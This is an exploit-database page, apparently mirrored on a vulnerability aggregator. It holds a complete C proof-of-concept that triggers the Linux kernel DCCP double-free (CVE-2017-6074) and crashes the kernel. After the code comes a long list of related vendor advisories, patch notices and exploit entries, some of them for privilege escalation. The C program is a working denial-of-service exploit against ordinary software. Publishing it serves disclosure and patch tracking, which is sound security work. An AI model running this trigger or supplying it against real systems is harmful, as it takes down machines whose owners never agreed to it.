//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov <[email protected]>
 
#define _GNU_SOURCE
 
#include <netinet/ip.h>
 
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
 
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
#include <arpa/inet.h>
 
int main() {
    struct sockaddr_in6 sa1;
    sa1.sin6_family = AF_INET6;
    sa1.sin6_port = htons(20002);
    inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
    sa1.sin6_flowinfo = 0;
    sa1.sin6_scope_id = 0;
         
    int optval = 8;
 
    int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    bind(s1, &sa1, 0x20);
    listen(s1, 0x9);
 
    setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);
 
    int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    connect(s2, &sa1, 0x20);
 
    shutdown(s1, SHUT_RDWR);
    close(s1);
    shutdown(s2, SHUT_RDWR);
    close(s2);
 
    return 0;
}

#  0day.today [2018-02-16]  #

oraclelinux 15

nessus 71

lenovo 2

packetstorm 2

redhat 15

cve 1

centos 3

fedora 2

prion 1

seebug 1

hackerone 1

threatpost 1

myhack58 2

openvas 32

f5 1

ubuntucve 1

exploitpack 2

zdt 1

veracode 1

debiancve 1

exploitdb 2

thn 1

virtuozzo 2

ubuntu 6

suse 9

archlinux 2

ibm 2

amazon 1

cloudfoundry 1

osv 2

debian 3

kitploit 1

mageia 3

androidsecurity 1

oracle 1

oraclelinux

Unbreakable Enterprise kernel security update

2017-02-24 00:00:00

kernel security update

2017-02-22 00:00:00

kernel security update

2017-02-22 00:00:00

nessus

RHEL 7 : kernel (RHSA-2017:0501)

2017-03-15 00:00:00

CentOS 7 : kernel (CESA-2017:0294)

2017-02-23 00:00:00

RHEL 6 : kernel (RHSA-2017:0366)

2017-03-02 00:00:00

lenovo

Lenovo StorSelect DX8200C HyperStore Use-after-free in the IPv6 implementation of the DCCP protocol in the Linux kernel - us

2017-06-08 00:00:00

Lenovo StorSelect DX8200C HyperStore Use-after-free in the IPv6 implementation of the DCCP protocol in the Linux kernel - Lenovo Support US

2017-06-08 00:00:00

packetstorm

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Privilege Escalation

2017-02-27 00:00:00

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Crash

2017-02-27 00:00:00

redhat

(RHSA-2017:0324) Important: kernel security update

2017-02-24 15:03:48

(RHSA-2017:0345) Important: kernel security update

2017-02-28 14:18:46

(RHSA-2017:0366) Important: kernel security update

2017-03-01 15:21:27

cve

CVE-2017-6074

2017-02-18 21:59:00

centos

kernel, perf, python security update

2017-02-23 04:21:38

kernel, perf, python security update

2017-02-23 05:45:33

kernel security update

2017-02-25 15:02:03

fedora

[SECURITY] Fedora 24 Update: kernel-4.9.12-100.fc24

2017-02-27 22:51:12

[SECURITY] Fedora 25 Update: kernel-4.9.12-200.fc25

2017-02-27 22:54:54

prion

Double free

2017-02-18 21:59:00

seebug

Linux kernel DCCP double-free vulnerability（CVE-2017-6074）

2017-02-23 00:00:00

hackerone

Internet Bug Bounty: Linux kernel: CVE-2017-6074: DCCP double-free vulnerability

2018-05-03 22:10:54

threatpost

Impact of New Linux Kernel DCCP Vulnerability Limited

2017-02-23 11:11:43

myhack58

Snow hidden for 11 years: Linux kernel DCCP double-free privilege escalation Vulnerability, CVE-2017-6074-a vulnerability warning-the black bar safety net

2017-02-23 00:00:00

Lurking in 11 years of Linux kernel to mention the right vulnerability-exposure-vulnerability warning-the black bar safety net

2017-02-23 00:00:00

openvas

CentOS Update for kernel CESA-2017:0294 centos7

2017-02-23 00:00:00

Fedora Update for kernel FEDORA-2017-4b9f61c68d

2017-03-02 00:00:00

CentOS Update for kernel CESA-2017:0293 centos6

2017-02-23 00:00:00

K82508682 : Linux kernel vulnerability CVE-2017-6074

2017-03-10 00:00:00

ubuntucve

CVE-2017-6074

2017-02-23 00:00:00

exploitpack

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)

2017-02-26 00:00:00

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation

2017-02-26 00:00:00

zdt

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation Exploit

2017-02-27 00:00:00

veracode

Denial Of Service (DoS)

2019-01-15 09:15:29

debiancve

CVE-2017-6074

2017-02-18 21:59:00

exploitdb

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)

2017-02-26 00:00:00

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation

2017-02-26 00:00:00

thn

11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered

2017-02-22 07:08:00

virtuozzo

Important kernel security update: new kernel 2.6.18-028stab122.1 for Virtuozzo Containers for Linux 4.6

2017-03-15 00:00:00

Important kernel security update: Virtuozzo ReadyKernel patch 14.0 for kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3)

2017-03-16 00:00:00

ubuntu

Linux kernel (Trusty HWE) vulnerabilities

2017-02-22 00:00:00

Linux kernel vulnerabilities

2017-02-22 00:00:00

Linux kernel vulnerabilities

2017-02-22 00:00:00

suse

Security update for the Linux Kernel (important)

2017-02-22 21:10:07

Security update for the Linux Kernel (important)

2017-02-22 21:15:53

Security update for the Linux Kernel (important)

2017-05-05 15:11:30

archlinux

[ASA-201702-17] linux: multiple issues

2017-02-22 00:00:00

[ASA-201702-18] linux-zen: multiple issues

2017-02-22 00:00:00

ibm

Security Bulletin: Vulnerabilities in the Linux Kernel affect PowerKVM

2018-06-18 01:37:19

Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in Linux kernel

2018-06-16 22:02:07

amazon

Important: kernel

2017-03-06 14:00:00

cloudfoundry

USN-3208-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry

2017-03-01 00:00:00

osv

linux - security update

2017-02-22 00:00:00

linux - security update

2017-02-22 00:00:00

debian

[SECURITY] [DLA 833-1] linux security update

2017-02-22 19:45:23

[SECURITY] [DSA 3791-1] linux security update

2017-02-22 19:15:13

[SECURITY] [DSA 3791-1] linux security update

2017-02-22 19:15:13

kitploit

Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework

2017-11-04 13:30:00

mageia

Updated kernel-tmb packages fixes security vulnerabilities

2017-02-25 11:29:30

Updated kernel-linus fixes security vulnerabilities

2017-02-25 11:29:30

Updated kernel and kmod packages fixes security vulnerabilities

2017-02-25 11:29:30

androidsecurity

Android Security Bulletin—July 2017

2017-07-05 00:00:00

oracle

CPU July 2018

2018-07-17 00:00:00

Products

Security Intelligence
Non-intrusive assessment
Developers SDK
Windows scanner
Linux scanner
Perimeter control tool
MSSP

Database

Vulnerabilities
Exploits
IOC
Security News
BugBounty
Popular
Wild Exploited
Top Vulnerabilities

Tools

Linux Security Scanner
API integration
Subscriptions
Plugins
Manual Audit

Learn More

Stats
API
Docs
Api-keys
License
Pricing
Glossary
FAQ

Company

Blog
Contacts
About Us
OpenSource
EULA
Brand Guideline
Privacy Policy

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please contact us. Using Vulners services you are accepting Vulners services end-user license agreement

@2024 Vulners Inc

0.0004 Low

EPSS

Percentile

0.4%

JSON

Related for 1337DAY-ID-27133